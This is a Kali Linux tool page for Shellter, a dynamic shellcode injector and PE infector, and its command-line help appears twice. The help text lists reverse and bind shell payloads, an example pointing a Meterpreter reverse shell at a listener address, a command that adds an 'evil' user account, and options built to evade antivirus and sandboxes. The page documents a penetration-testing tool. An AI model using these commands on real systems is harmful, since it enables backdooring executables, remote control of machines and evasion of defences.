shellter Package Description
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only). The shellcode can be something yours or something generated through a framework, such as Metasploit.
Source: https://www.shellterproject.com/introducing-shellter/
shellter Homepage | Kali shellter Repo
- Author: Kyriakos Economou
- License: special
Tools included in the shellter package
shellter – Dynamic shellcode injection tool and dynamic PE infector
root@kali:~# shellter.exe -h
**********************
* Command Line Usage *
**********************
Help: -h, --help
Action: Shows the command line help menu.
List Payloads: --list
Action: Shows a list of the embedded payloads.
Verbose Mode: -v
Action: Shows Real-Time Tracing.
Operation Mode: -a / -m
Action: Sets the Operation Mode to use.
-a: Auto Mode, -m: Manual Mode. (See Remarks)
Note: Manual Mode requires user interaction for all options.
Online version check: --VersionCheck
Action: Retrieves version information from the official website.
Note: Requires internet connection. Not available in Wine mode.
PE target: -f <filename>
Action: Sets the PE target.
Stealth Mode: -s / --stealth
Action: Enables Stealth Mode feature. Preserves original functionality of
the infected PE file.
Note: If this feature is enabled then --enc, --encode, and --handler IAT
are implied as set.
Payload: -p <filename>/<listed payload>
Action: Sets the payload. Must be in RAW format.
Metasploit: generate -t raw.
The following payloads can be used directly through Shellter.
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Example: -p meterpreter_reverse_tcp --lhost 192.168.30.133 --port 4444
LHOST: --lhost <IP address>/<Domain Name>
Action: Sets the IP address or the Domain Name for the embedded payloads
that use reverse connection.
Note: Domain names can be used with the reverse_http and reverse_https
payloads, or with custom payloads generated by the user.
Port: --port <Port number>
Action: Sets the port number for the embedded payloads that
either use reverse connection, or listen locally for
inbound connections.
CMD: --cmd <cmd argument>
Action: Sets the command to execute argument for the embedded
windows command execution payload.
Example: -p winexec --cmd "cmd.exe /c net user evil password /ADD"
Enable DLL Reflective Loader support: --reflective <FuncName>
Action: Marks the payload as DLL and sets the reflective loader function.
This flag automatically enables encoded-payload support because the loader
might require RW permissions to itself. You will have to set the --handler
argument as well.
Note: Function names are case sensitive.
Threads tracing: --trace main / all
Action: Sets the threads to be traced.
main: Main Thread, all: All Threads Tracing.
Note: It is recommended to enable all threads tracing. This is enabled
by default when auto mode is used without command line arguments.
Enable encoded-payload support: --enc
Action: Handles encoded payloads.
Note: If you use an encoded payload, this flag is mandatory! However,
it is enabled by default when auto mode is used without command
line arguments.
It is recommended to always use encoded payloads, unless they
are completely custom, thus not known to AVs.
Note: You can choose to apply Shellter's encoder by using the --encode
arument. It can also be used on top of already encoded payloads.
Proprietary Shellter Encoding: --encode / --encode {<encoding sequence>}
Action: Applies an extra encoding layer.
It is enabled by default when using auto mode without command
line arguments.
********************************
* Supported Encoding Operators *
********************************
XOR --> x
ADD --> +
SUB --> -
NOT --> !
Example #1: x!+x
Note: When the encoding sequence is defined from the command line, the
operators need to be enclosed between '{}'.
Example #2: --encode {x!+}
Note: In Manual mode you must not include the '{}' characters, just as in the
first example shown above.
Remarks: The number of operators defined, must be between a minimum of 1 and
a maximum of 12 operators.
If you just use the --encode switch without defining a custom
sequence of encoding operations, Shellter will randomly create
and apply an encoding scheme by itself.
If you enable stealth mode using --stealh/-s switches, then the
--encode switch is implied, but if you want to use a custom one
then you need to explicitly use the --encode switch as shown
in Example #2.
Note: You will have to set the --handler argument as well.
Note: If you set --encode switch, then --enc is implied as set.
Encode using Dynamic Thread Context Key: --DTCK
Action: Encodes the payload using dynamic thread context information.
Note: This is an experimental feature that logs the content of some
CPU registers and then filters all that data in order to keep
injection locations where at least one of the logged registers
has a value that can be reliably used for encoding and later
for decoding the payload on runtime.
Note: If you set this flag, then --encode and --enc are implied as set.
In Auto mode, this feature can only be activated by using command
line arguments.
Proprietary Decoder Obfuscation: --polyDecoder
Action: Obfuscates the decoder generated by Shellter using
Thread Context Aware Polymorphic code.
Note: This only applies if --encode option has been set. It is
enabled by default when using auto mode without command
line arguments.
Encoded Payload Handling Type: --handler iat / section
Action: Defines how the encoded payload will be handled.
iat: Use IAT pointers, section: Give to section RWE permissions.
Note: If you use an encoded payload, this flag is mandatory! However,
when you use auto mode without command line arguments, this is
enabled by default.
Obfuscate IAT type handler: --polyIAT
Action: Enables obfuscation of IAT type handlers for encoded payloads
using Thread Context Aware Polymorphic code.
Note: Contributes towards a much more polymorphic output! It is enabled
by default when using auto mode without command line arguments.
Generate & Bind PolyMorphic Junk Code: --junk
Action: Enables PolyMorphic Junk Code.
Note: It is recommended to enable this option in order to produce
a more complex output. This type of code added also serves
for timing-out some emulators and sandboxes. You might have
to wait for a few seconds before the payload gets executed.
Note: This feature is enabled by default when using automode without
command line arguments.
Remarks:
i. When running inside Wine, the compatible Engine is selected automatically.
ii. If Manual Mode has been selected, all other options are ignored.
iii. If no Operation Mode (-a/-m) has been selected though command line,
then Auto Mode applies.
iv. If '--enc' and/or '--encode' and/or --DTCK are set, then '--handler' must
be also set.
v. Tracing of all threads is enabled by default when using the Auto Mode.
You can disable it by specifying '--trace main' -Not Recommended-.
vi. If Stealth Mode is enabled (-s/--stealth), the injected payload will
always be encoded by Shellter and --handler IAT is set by default.
vii. Arguments can be passed in any order. If the same argument is used more
than once, then only the first occurence is taken in consideration.
**********************
* Command Line Usage *
**********************
Help: -h, --help
Action: Shows the command line help menu.
List Payloads: --list
Action: Shows a list of the embedded payloads.
Verbose Mode: -v
Action: Shows Real-Time Tracing.
Operation Mode: -a / -m
Action: Sets the Operation Mode to use.
-a: Auto Mode, -m: Manual Mode. (See Remarks)
Note: Manual Mode requires user interaction for all options.
Online version check: --VersionCheck
Action: Retrieves version information from the official website.
Note: Requires internet connection. Not available in Wine mode.
PE target: -f <filename>
Action: Sets the PE target.
Stealth Mode: -s / --stealth
Action: Enables Stealth Mode feature. Preserves original functionality of
the infected PE file.
Note: If this feature is enabled then --enc, --encode, and --handler IAT
are implied as set.
Payload: -p <filename>/<listed payload>
Action: Sets the payload. Must be in RAW format.
Metasploit: generate -t raw.
The following payloads can be used directly through Shellter.
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Example: -p meterpreter_reverse_tcp --lhost 192.168.30.133 --port 4444
LHOST: --lhost <IP address>/<Domain Name>
Action: Sets the IP address or the Domain Name for the embedded payloads
that use reverse connection.
Note: Domain names can be used with the reverse_http and reverse_https
payloads, or with custom payloads generated by the user.
Port: --port <Port number>
Action: Sets the port number for the embedded payloads that
either use reverse connection, or listen locally for
inbound connections.
CMD: --cmd <cmd argument>
Action: Sets the command to execute argument for the embedded
windows command execution payload.
Example: -p winexec --cmd "cmd.exe /c net user evil password /ADD"
Enable DLL Reflective Loader support: --reflective <FuncName>
Action: Marks the payload as DLL and sets the reflective loader function.
This flag automatically enables encoded-payload support because the loader
might require RW permissions to itself. You will have to set the --handler
argument as well.
Note: Function names are case sensitive.
Threads tracing: --trace main / all
Action: Sets the threads to be traced.
main: Main Thread, all: All Threads Tracing.
Note: It is recommended to enable all threads tracing. This is enabled
by default when auto mode is used without command line arguments.
Enable encoded-payload support: --enc
Action: Handles encoded payloads.
Note: If you use an encoded payload, this flag is mandatory! However,
it is enabled by default when auto mode is used without command
line arguments.
It is recommended to always use encoded payloads, unless they
are completely custom, thus not known to AVs.
Note: You can choose to apply Shellter's encoder by using the --encode
arument. It can also be used on top of already encoded payloads.
Proprietary Shellter Encoding: --encode / --encode {<encoding sequence>}
Action: Applies an extra encoding layer.
It is enabled by default when using auto mode without command
line arguments.
********************************
* Supported Encoding Operators *
********************************
XOR --> x
ADD --> +
SUB --> -
NOT --> !
Example #1: x!+x
Note: When the encoding sequence is defined from the command line, the
operators need to be enclosed between '{}'.
Example #2: --encode {x!+}
Note: In Manual mode you must not include the '{}' characters, just as in the
first example shown above.
Remarks: The number of operators defined, must be between a minimum of 1 and
a maximum of 12 operators.
If you just use the --encode switch without defining a custom
sequence of encoding operations, Shellter will randomly create
and apply an encoding scheme by itself.
If you enable stealth mode using --stealh/-s switches, then the
--encode switch is implied, but if you want to use a custom one
then you need to explicitly use the --encode switch as shown
in Example #2.
Note: You will have to set the --handler argument as well.
Note: If you set --encode switch, then --enc is implied as set.
Encode using Dynamic Thread Context Key: --DTCK
Action: Encodes the payload using dynamic thread context information.
Note: This is an experimental feature that logs the content of some
CPU registers and then filters all that data in order to keep
injection locations where at least one of the logged registers
has a value that can be reliably used for encoding and later
for decoding the payload on runtime.
Note: If you set this flag, then --encode and --enc are implied as set.
In Auto mode, this feature can only be activated by using command
line arguments.
Proprietary Decoder Obfuscation: --polyDecoder
Action: Obfuscates the decoder generated by Shellter using
Thread Context Aware Polymorphic code.
Note: This only applies if --encode option has been set. It is
enabled by default when using auto mode without command
line arguments.
Encoded Payload Handling Type: --handler iat / section
Action: Defines how the encoded payload will be handled.
iat: Use IAT pointers, section: Give to section RWE permissions.
Note: If you use an encoded payload, this flag is mandatory! However,
when you use auto mode without command line arguments, this is
enabled by default.
Obfuscate IAT type handler: --polyIAT
Action: Enables obfuscation of IAT type handlers for encoded payloads
using Thread Context Aware Polymorphic code.
Note: Contributes towards a much more polymorphic output! It is enabled
by default when using auto mode without command line arguments.
Generate & Bind PolyMorphic Junk Code: --junk
Action: Enables PolyMorphic Junk Code.
Note: It is recommended to enable this option in order to produce
a more complex output. This type of code added also serves
for timing-out some emulators and sandboxes. You might have
to wait for a few seconds before the payload gets executed.
Note: This feature is enabled by default when using automode without
command line arguments.
Remarks:
i. When running inside Wine, the compatible Engine is selected automatically.
ii. If Manual Mode has been selected, all other options are ignored.
iii. If no Operation Mode (-a/-m) has been selected though command line,
then Auto Mode applies.
iv. If '--enc' and/or '--encode' and/or --DTCK are set, then '--handler' must
be also set.
v. Tracing of all threads is enabled by default when using the Auto Mode.
You can disable it by specifying '--trace main' -Not Recommended-.
vi. If Stealth Mode is enabled (-s/--stealth), the injected payload will
always be encoded by Shellter and --handler IAT is set by default.
vii. Arguments can be passed in any order. If the same argument is used more
than once, then only the first occurence is taken in consideration.
shellter Usage Examples
root@kali:~# dpkg --add-architecture i386
root@kali:~# apt update && apt install wine32
root@kali:~# shellter
root@kali:~# apt update && apt install wine32
root@kali:~# shellter
